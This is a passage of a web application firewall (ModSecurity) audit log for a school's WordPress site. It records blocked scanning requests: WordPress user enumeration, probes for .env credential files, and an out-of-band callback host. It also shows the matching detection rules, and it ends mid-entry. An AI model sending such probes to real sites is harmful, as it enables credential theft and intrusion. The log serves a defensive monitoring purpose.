Engine-Mode: "ENABLED" --0a73f913-Z-- --a73dd233-A-- [31/May/2025:21:05:24 +0700] aDsMpJ3Kgs4r2wz12c4kHAAAABM 103.236.140.4 37428 103.236.140.4 8181 --a73dd233-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.200.15.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.200.15.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a73dd233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73dd233-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748700324283565 2679 (- - -) Stopwatch2: 1748700324283565 2679; combined=1239, p1=392, p2=815, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73dd233-Z-- --8185180a-A-- [31/May/2025:21:36:12 +0700] aDsT3Og1nD2n5twq7NvIUwAAAEk 103.236.140.4 41946 103.236.140.4 8181 --8185180a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.240.226.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.240.226.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8185180a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8185180a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748702172120312 2819 (- - -) Stopwatch2: 1748702172120312 2819; combined=1203, p1=412, p2=761, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8185180a-Z-- --ebca4961-A-- [31/May/2025:22:34:32 +0700] aDshiOg1nD2n5twq7NvXWwAAAFU 103.236.140.4 51648 103.236.140.4 8181 --ebca4961-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.34.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.34.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebca4961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebca4961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748705672455699 2938 (- - -) Stopwatch2: 1748705672455699 2938; combined=1258, p1=422, p2=808, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebca4961-Z-- --7c2be41a-A-- [31/May/2025:22:52:41 +0700] aDslyeg1nD2n5twq7NvcXQAAAEE 103.236.140.4 44754 103.236.140.4 8181 --7c2be41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.70.177.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.70.177.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7c2be41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c2be41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748706761933440 3695 (- - -) Stopwatch2: 1748706761933440 3695; combined=2100, p1=669, p2=1396, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c2be41a-Z-- --950afd69-A-- [31/May/2025:23:07:35 +0700] aDspRx_L2Rte6DjSjWbOEAAAAI4 103.236.140.4 34900 103.236.140.4 8181 --950afd69-B-- POST /-/jira/login/oauth/access_token HTTP/1.0 Host: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Real-IP: 27.110.165.147 X-Forwarded-Host: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Forwarded-Server: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Forwarded-For: 27.110.165.147 X-Forwarded-Proto: http Connection: close --950afd69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --950afd69-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748707655613195 906 (- - -) Stopwatch2: 1748707655613195 906; combined=344, p1=310, p2=0, p3=0, p4=0, p5=34, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --950afd69-Z-- --42638424-A-- [31/May/2025:23:19:58 +0700] aDssLug1nD2n5twq7NvkhgAAAE0 103.236.140.4 48526 103.236.140.4 8181 --42638424-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.170.129.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.170.129.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42638424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42638424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748708398671014 2543 (- - -) Stopwatch2: 1748708398671014 2543; combined=1465, p1=470, p2=922, p3=0, p4=0, p5=73, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42638424-Z-- --6d781158-A-- [31/May/2025:23:34:12 +0700] aDsvhB_L2Rte6DjSjWbUXwAAAIE 103.236.140.4 33790 103.236.140.4 8181 --6d781158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.81.222.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.81.222.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6d781158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d781158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748709252495052 4299 (- - -) Stopwatch2: 1748709252495052 4299; combined=2188, p1=659, p2=1491, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d781158-Z-- --9d94ae4b-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GIQAAAMQ 103.236.140.4 46172 103.236.140.4 8181 --9d94ae4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --9d94ae4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d94ae4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029210473 758 (- - -) Stopwatch2: 1748710029210473 758; combined=311, p1=271, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d94ae4b-Z-- --91870f34-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GIwAAAMU 103.236.140.4 46186 103.236.140.4 8181 --91870f34-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --91870f34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91870f34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029568911 769 (- - -) Stopwatch2: 1748710029568911 769; combined=283, p1=229, p2=0, p3=0, p4=0, p5=54, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91870f34-Z-- --b8169704-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GJAAAAMA 103.236.140.4 46198 103.236.140.4 8181 --b8169704-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --b8169704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8169704-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029934891 791 (- - -) Stopwatch2: 1748710029934891 791; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8169704-Z-- --1c86e57d-A-- [01/Jun/2025:00:45:25 +0700] aDtANZ3Kgs4r2wz12c5aMwAAAAw 103.236.140.4 49424 103.236.140.4 8181 --1c86e57d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) Accept-Charset: utf-8 --1c86e57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c86e57d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748713525325440 876 (- - -) Stopwatch2: 1748713525325440 876; combined=385, p1=324, p2=0, p3=0, p4=0, p5=61, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c86e57d-Z-- --0f5bc615-A-- [01/Jun/2025:02:35:56 +0700] aDtaHOg1nD2n5twq7NsDSAAAAFQ 103.236.140.4 49826 103.236.140.4 8181 --0f5bc615-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f5bc615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5bc615-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748720156962836 2831 (- - -) Stopwatch2: 1748720156962836 2831; combined=1316, p1=449, p2=838, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5bc615-Z-- --9f3a7740-A-- [01/Jun/2025:02:35:59 +0700] aDtaH-g1nD2n5twq7NsDUQAAAFA 103.236.140.4 49848 103.236.140.4 8181 --9f3a7740-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f3a7740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f3a7740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748720159410565 2776 (- - -) Stopwatch2: 1748720159410565 2776; combined=1278, p1=423, p2=825, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3a7740-Z-- --8cd61a39-A-- [01/Jun/2025:03:17:43 +0700] aDtj553Kgs4r2wz12c5uKgAAAAQ 103.236.140.4 55456 103.236.140.4 8181 --8cd61a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8cd61a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cd61a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748722663361245 2895 (- - -) Stopwatch2: 1748722663361245 2895; combined=1282, p1=421, p2=830, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd61a39-Z-- --9a3eb902-A-- [01/Jun/2025:03:17:45 +0700] aDtj6Z3Kgs4r2wz12c5uLAAAABQ 103.236.140.4 55460 103.236.140.4 8181 --9a3eb902-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a3eb902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a3eb902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748722665785144 2628 (- - -) Stopwatch2: 1748722665785144 2628; combined=1199, p1=427, p2=742, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a3eb902-Z-- --de8f564f-A-- [01/Jun/2025:04:25:08 +0700] aDtztO4LjVe0Eerk_ZaHfgAAAEw 103.236.140.4 57142 103.236.140.4 8181 --de8f564f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.152.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.152.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de8f564f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8f564f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748726708988809 3165 (- - -) Stopwatch2: 1748726708988809 3165; combined=1397, p1=529, p2=838, p3=0, p4=0, p5=30, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8f564f-Z-- --d9d7ab0e-A-- [01/Jun/2025:04:28:11 +0700] aDt0awQ4kZQGAOBHoB5CRgAAANE 103.236.140.4 57158 103.236.140.4 8181 --d9d7ab0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 Accept-Charset: utf-8 --d9d7ab0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9d7ab0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748726891465836 994 (- - -) Stopwatch2: 1748726891465836 994; combined=420, p1=378, p2=0, p3=0, p4=0, p5=42, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9d7ab0e-Z-- --dfc69d21-A-- [01/Jun/2025:05:13:24 +0700] aDt_BEaTRmdfB-FaJjm5HQAAAA0 103.236.140.4 57474 103.236.140.4 8181 --dfc69d21-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 175.6.127.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 175.6.127.77 X-Forwarded-Proto: https Connection: close Content-Length: 73 User-Agent: python-httpx/0.27.0 accept: application/dns-message content-type: application/dns-message --dfc69d21-C-- ÂÞ 1d8720ea3e6b11f09d62fa163e75cb8f openresolverdnslabcn --dfc69d21-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc69d21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 